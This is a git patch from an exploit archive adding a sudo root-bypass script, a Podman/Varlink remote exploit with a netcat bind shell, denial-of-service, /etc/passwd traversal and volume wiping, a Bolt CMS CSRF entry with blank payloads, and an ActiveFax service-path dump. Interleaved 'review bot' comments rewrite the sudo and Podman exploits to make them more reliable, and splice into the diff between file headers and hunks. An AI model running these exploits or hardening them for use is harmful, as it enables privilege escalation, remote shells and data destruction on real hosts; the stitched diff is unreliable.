From bae704d68183a940e81f3c871755cdd8d575727c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 16 Oct 2019 05:01:45 +0000
Subject: [PATCH] DB: 2019-10-16
4 changes to exploits/shellcodes
sudo 1.8.28 - Security Bypass
ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path
Podman & Varlink 1.5.1 - Remote Code Execution
Bolt CMS 3.6.10 - Cross-Site Request Forgery
---
 exploits/linux/local/47502.py | 80 +++++++
 exploits/linux/remote/47500.py | 302 +++++++++++++++++++++++++
 exploits/php/webapps/47501.txt | 368 +++++++++++++++++++++++++++++++
 exploits/windows/local/47503.txt | 22 ++
 files_exploits.csv | 4 +
 5 files changed, 776 insertions(+)
 create mode 100755 exploits/linux/local/47502.py
 create mode 100755 exploits/linux/remote/47500.py
 create mode 100644 exploits/php/webapps/47501.txt
 create mode 100644 exploits/windows/local/47503.txt
diff --git a/exploits/linux/local/47502.py b/exploits/linux/local/47502.py
new file mode 100755
index 000000000..881633be8
--- /dev/null
+++ b/exploits/linux/local/47502.py
@@ -0,0 +1,80 @@
+# Exploit Title : sudo 1.8.28 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam
+# Version : Sudo <1.2.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : N/A
+
+'''Check for the user sudo permissions
+
+sudo -l
+
+User hacker may run the following commands on kali:
+ (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT:
+
+sudo -u#-1 /bin/bash
+
+Example :
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)
\ No newline at end of file
diff --git a/exploits/linux/remote/47500.py b/exploits/linux/remote/47500.py
new file mode 100755
index 000000000..b11dccbc6
--- /dev/null
+++ b/exploits/linux/remote/47500.py
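Review bot: The `#!/usr/bin/python3` line sits after the header comment and the docstring, so it is not a shebang and the 100755 file mode buys nothing; it belongs on line 1. The discovery logic is also fragile: `sudo -l` is piped through `grep 'ALL' | cut` into two files (`priv`, `binary`) that are left in the working directory, any line containing `ALL` matches (an unrelated `(ALL : ALL) ALL` rule would too), the path is handed to `os.system` with its trailing newline, and `username` is read but never used. The bypass only applies to a Runas spec that excludes root, such as `(ALL, !root) /bin/bash` in the docstring, so the script should look for exactly that entry and run the matched binary through `subprocess` with an argument list, as sketched below. Separately, the header says `# Version : Sudo <1.2.28` while `# Fix` says 1.8.28 — presumably `< 1.8.28` is meant — and the title names the fixed release rather than the affected ones.
```python
# … unchanged: header comment and usage docstring; `import os` becomes `import subprocess` …

listing = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout
binary = None
for line in listing.splitlines():
    # only a Runas spec that excludes root, e.g. "(ALL, !root) /bin/bash", is affected
    if "!root)" in line:
        binary = line.split(")", 1)[1].strip()
        break
if not binary:
    raise SystemExit("no '(ALL, !root)' sudoers entry found; nothing to exploit")
print("Lets hope it works")
subprocess.run(["sudo", "-u#-1", binary])
```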
@@ -0,0 +1,302 @@
+# Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution
+# Exploit Author: Jeremy Brown
+# Date: 2019-10-15
+# Vendor Homepage: https://podman.io/
+# Software Link: dnf install podman or https://github.com/containers/libpod/releases
+# Version: 1.5.1
+# Tested on: Fedora Server 30
+
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+#
+# pickletime.py
+#
+# Podman + Varlink Insecure Config Remote Exploit
+#
+# -------
+# Details
+# -------
+#
+# Podman is container engine / platform similar to Docker supported
+# by RedHat and Fedora with Varlink being a protocol to exchange
+# messages, which comes in handy for things like a Remote API.
+#
+# Now depending on how Podman and Varlink are deployed, they can be
+# susceptible to local and remote attacks. There are a few API bugs
+# in Podman itself, as well as a way to execute arbitary commands if
+# one can hit Podman via the Remote API. Running Podman with Varlink
+# over tcp listening either on localhost or the network interface is the
+# most vulnerable setup, but other ways such as access via the local UNIX
+# socket or over SSH (key /w no passphrase is common) aren't likely
+# to be vulnerable unless ACLs or other stuff is broken.
+#
+# ------------------
+# Testing the issues
+# ------------------
+#
+# - check; just connects and issues GetInfo() to see if the host is
+# running a podman service
+#
+# - exec; arbitrary cmd execution via ContainerRunlabel() specified
+# by "run" label in the specified hosted image (self-setup)
+#
+# - dos; crash the server via choosing a /random/ selection from
+# the available parsing bugs in APIs (we like to have fun here)
+#
+# - blind; dir traversal in SearchImages() API to force server to
+# read an arbitrary file (no client-side output)
+#
+# - volrm; loops to remove all volumes via VolumeRemove() behavior
+#
+# ---------
+# Exec demo
+# ---------
+#
+# $ ./pickletime.py check podman-host:6000
+# -> Podman service confirmed on host
+#
+# Then create a Dockerfile with an edgy label, build and host it.
+#
+# [Dockerfile]
+# FROM busybox
+# LABEL run=“nc -l -p 10000 -e /bin/bash”
+#
+# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run
+# Done!
+#
+# $ nc podman-host 10000
+# ps
+# PID TTY TIME CMD
+# 111640 pts/1 00:00:00 bash
+# 111786 pts/1 00:00:00 podman
+# 111797 pts/1 00:00:00 nc
+# 111799 pts/1 00:00:00 bash
+# 111801 pts/1 00:00:00 ps
+#
+#
+# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
+#
+# -----------
+# Other stuff
+# -----------
+#
+# Note: admins can really setup their connection and deployment configuration
+# however they like, so it's hard to say how many folks are 'doing it wrong'
+# or actually are running with proper auth and hardening in place. Shodan
+# folks have been contacted about adding support to discover Varlink services
+# to get more data that way as well.
+#
+# Fixed bugs:
+# - DoS #2 was fixed in 1.5.1
+# - Updated security docs / cli flags TBD
+#
+# > Why pickles? Why not.
+#
+# Dependencies to run this code:
+#
+# sudo dnf install -y python3-podman-api
+#
+#
+#
+
+import os
+import sys
+import socket
+import subprocess
+import random
+import json
+import podman
+import pickle
+import time
+
+serviceName = 'io.podman' # service name
+
+def main():
+ if(len(sys.argv) < 2):
+ print("Usage: %s [action....params]\n" % sys.argv[0])
+ print("Eg: %s check tcp:podman-host:6000" % sys.argv[0])
+ print("... %s exec tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
+ print("Actions: check, exec, dos, blind, volrm\n")
+ return
+
+ action = sys.argv[1]
+ address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing
+
+ ip = address.split(':')[1]
+ port = int(address.split(':')[2])
+
+ if(action == 'exec'):
+ if(len(sys.argv) < 4):
+ print("Error: need more args for exec")
+ return
+
+ image = sys.argv[3] # 'source' for pull
+ label = sys.argv[4]
+
+ isItTime()
+
+ try:
+ pman = podman.Client(uri=address)
+ except Exception:
+ print("Error: can't connect to host")
+ return
+
+ if(action == 'check'):
+ result = json.dumps(pman.system.info())
+
+ if('podman_version' in result):
+ print("-> Podman service confirmed on host")
+ return
+
+ print("-!- Podman service was not found on host")
+
+
+ elif(action == 'exec'):
+ #
+ # First pull the image from the repo, then run the label
+ #
+ try:
+ result = pman.images.pull(image) # PullImage()
+ except Exception as error:
+ pass # call fails sometimes if image already exists which is *ok*
+
+ #
+ # ContainerRunlabel() ... but, no library imp. we'll do it live!
+ #
+ method = serviceName + '.' + 'ContainerRunlabel'
+
+ message = '{\"method\":\"'
+ message += method
+ message += '\",\"parameters\":'
+ message += '{\"Runlabel\":{\"image\":\"'
+ message += image
+ message += '\",\"label\":\"'
+ message += label
+ message += '\"}}}'
+ message += '\0' # end each msg with a NULL byte
+
+ doSocketSend(ip, port, message)
+
+
+ elif(action == 'dos'):
+ #bug = 1 # !fun
+ bug = random.randint(1,2) # fun
+
+ if(bug == 1):
+ print("one")
+ source = 'test'
+
+ method = serviceName + '.' + 'LoadImage'
+
+ message = '{\"method\":\"'
+ message += method
+ message += '\",\"parameters\":'
+ message += '{\"source":\"'
+ message += source
+ message += '\"}}'
+ message += '\0'
+
+ doSocketSend(ip, port, message)
+
+
+ # works on 1.4.4, fixed in 1.5.1
+ if(bug == 2):
+ print("two")
+
+ reference = 'b' * 238
+ source = '/dev/null' # this file must exist locally
+
+ method = serviceName + '.' + 'ImportImage'
+
+ message = '{\"method\":\"'
+ message += method
+ message += '\",\"parameters\":'
+ message += '{\"reference\":\"'
+ message += reference
+ message += '\",\"source\":\"'
+ message += source
+ message += '\"}}'
+ message += '\0'
+
+ doSocketSend(ip, port, message)
+
+
+ #
+ # blind read of arbitrary files server-side
+ # ...interesting but not particularly useful by itself
+ #
+ # openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7
+ # lseek(7, 0, SEEK_CUR) = 0
+ # fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0
+ # read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672
+ # close(7)
+ #
+ elif(action == 'blind'):
+ method = serviceName + '.' + 'SearchImages'
+ query = '../../../etc/passwd/' # magic '/' at the end
+
+ message = '{\"method\":\"'
+ message += method
+ message += '\",\"parameters\":'
+ message += '{\"query\":\"'
+ message += query
+ message += '\"}}'
+ message += '\0'
+
+ #pman.images.search(query) # unclear why this doesn't work
+ doSocketSend(ip, port, message)
+
+ #
+ # Not really a bug, but an interesting feature to demo without auth
+ # note: call CreateVolume() a few times beforehand to test the removal
+ #
+ elif(action == 'volrm'):
+ method = serviceName + '.' + 'VolumeRemove'
+ n = 10 # this is probably enough to test, but change as necessary
+
+ message = '{\"method\":\"'
+ message += method
+ message += '\",\"parameters\":'
+ message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal
+ message += '\0'
+
+ for _ in range(n):
+ doSocketSend(ip, port, message)
+ time.sleep(0.5) # server processing time
+
+ print("Done!")
+
+
+#
+# podman/varlink libaries don't support calling these API calls, so native we must
+#
+def doSocketSend(ip, port, message):
+ try:
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.connect((ip, port))
+ sock.send(message.encode())
+
+ except Exception as error:
+ print(str(error))
+ return
+
+ finally:
+ sock.close()
+
+
+#
+# obligatory routine
+#
+def isItTime():
+ tm = time.localtime()
+
+ p = pickle.dumps('it\'s pickle time!')
+
+ if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')):
+ print(pickle.loads(p))
+ else:
+ pass # no dill
+
+
+if(__name__ == '__main__'):
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/47501.txt b/exploits/php/webapps/47501.txt
new file mode 100644
index 000000000..e10136e7d
--- /dev/null
+++ b/exploits/php/webapps/47501.txt
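Review bot: `doSocketSend` binds `sock` inside the `try`, so if `socket.socket()` itself raises the `finally` calls `sock.close()` on an unbound name and the real error is replaced by an UnboundLocalError; it also uses `send()`, which may write only part of the varlink message. The requests are assembled by string concatenation even though `json` is imported, so an image name or label containing a quote or backslash produces invalid JSON instead of the intended `ContainerRunlabel` call — `json.dumps` does the escaping. Two smaller things in `main`: `sys.argv[2]` is read after only `len(sys.argv) < 2` is checked, and `int(address.split(':')[2])` raises IndexError for the `unix:/run/podman/io.podman` form the inline comment suggests. The rewrite below keeps the print-on-error behaviour and the trailing NUL terminator.
```python
def varlinkMessage(method, parameters):
    # json.dumps escapes quotes/backslashes in user-supplied image and label values
    return json.dumps({"method": method, "parameters": parameters}) + '\0'

# … unchanged: main(); each hand-built message becomes e.g.
#     message = varlinkMessage(method, {"Runlabel": {"image": image, "label": label}}) …

def doSocketSend(ip, port, message):
    # create_connection raises before any socket is bound, so nothing to close on failure
    try:
        with socket.create_connection((ip, port), timeout=10) as sock:
            sock.sendall(message.encode())  # send() may return after a partial write
    except OSError as error:
        print(str(error))
```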
@@ -0,0 +1,368 @@
+# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
+# Date: 2019-10-15
+# Exploit Author: r3m0t3nu11[Zero-Way]
+# Vendor Homepage: https://bolt.cm/
+# Software Link: https://bolt.cm/
+# Version: up to date and 6.5
+# Tested on: Linux
+# CVE : N/A
+
+# last version
+
+# Csrf p0c
+
+
+
+Bolt v 3.x exploit 0day
+
+

Bolt v 3.x csrf -> xss -> rce exploit

+
+
+
+
+
+
+
+
+
+JS p0c
+
+
+
+
+version 6.5
+
+CSrf p0c
+
+
+
+Bolt v 3.x CVE-2019-17591 exploit
+
+

Bolt v 3.x csrf -> xss -> rce exploit

+
+
+
+
+
+
+
+
+
+Js p0c
+
+
+
+
+proof of concept :
+
+https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
+
+https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
+
+Greetz to :
+Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
+Virus,m7md1337,D3vil1337,and all my friends
\ No newline at end of file
diff --git a/exploits/windows/local/47503.txt b/exploits/windows/local/47503.txt
new file mode 100644
index 000000000..c970fc1d9
--- /dev/null
+++ b/exploits/windows/local/47503.txt
@@ -0,0 +1,22 @@
+# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor Homepage: https://www.actfax.com/
+# Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe
+# Version : ActiveFax Server 6.92 Build 0316
+# Tested on Windows 10
+# CVE : N/A
+
+sc qc ActiveFaxServiceNT
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ActiveFaxServiceNT
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ActiveFax-Server-Dienst
+ DEPENDENCIES :
+ SERVICE_START_NAME : .\Administrator
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f84711ec5..2a21ceb3f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
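Review bot: The Bolt header says `# CVE : N/A` while the body labels the second PoC `Bolt v 3.x CVE-2019-17591 exploit`, and `# Version: up to date and 6.5` does not agree with the 3.6.10 in the title; the header should read `# CVE : CVE-2019-17591` and name the Bolt version that was actually tested. The CSRF and JS payloads themselves are not visible in this copy of the hunk — only empty `+` lines survive where the HTML forms presumably were — so the claimed `csrf -> xss -> rce` chain cannot be checked from here, and the two Google Drive links are the only evidence, which is not a durable reference for an archived entry. The body also calls the issue an `0day` while citing a CVE for it; one of the two should go.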
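Review bot: The `sc qc` dump only shows an unquoted `BINARY_PATH_NAME` containing a space (`C:\Program Files\ActiveFax\Server\ActSrvNT.exe`); nothing in the write-up shows that the hijack location is writable, so exploitability is not established. With a single space in the path the service manager's only alternative candidate is `C:\Program.exe`, which requires write access to the `C:\` root rather than to the ActiveFax directory, and on a stock Windows 10 install that is normally not granted to standard users — an `icacls C:\` run from the low-privileged account belongs in the entry. `SERVICE_START_NAME : .\Administrator` also matters: a successful hijack runs as that local account, not LocalSystem, which the title's implied privilege gain should state. I'd add a line such as `# Note: hijack path is C:\Program.exe (needs write on C:\); service runs as .\Administrator, not SYSTEM`.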
@@ -10716,6 +10716,8 @@ id,file,description,date,author,type,platform,port
 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
+47502,exploits/linux/local/47502.py,"sudo 1.8.28 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
+47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17713,6 +17715,7 @@ id,file,description,date,author,type,platform,port
 47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware,
 47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows,
 47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows,
+47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41828,3 +41831,4 @@ id,file,description,date,author,type,platform,port
 47496,exploits/php/webapps/47496.txt,"Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting",2019-10-14,"Debashis Pal",webapps,php,
 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,
 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
+47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,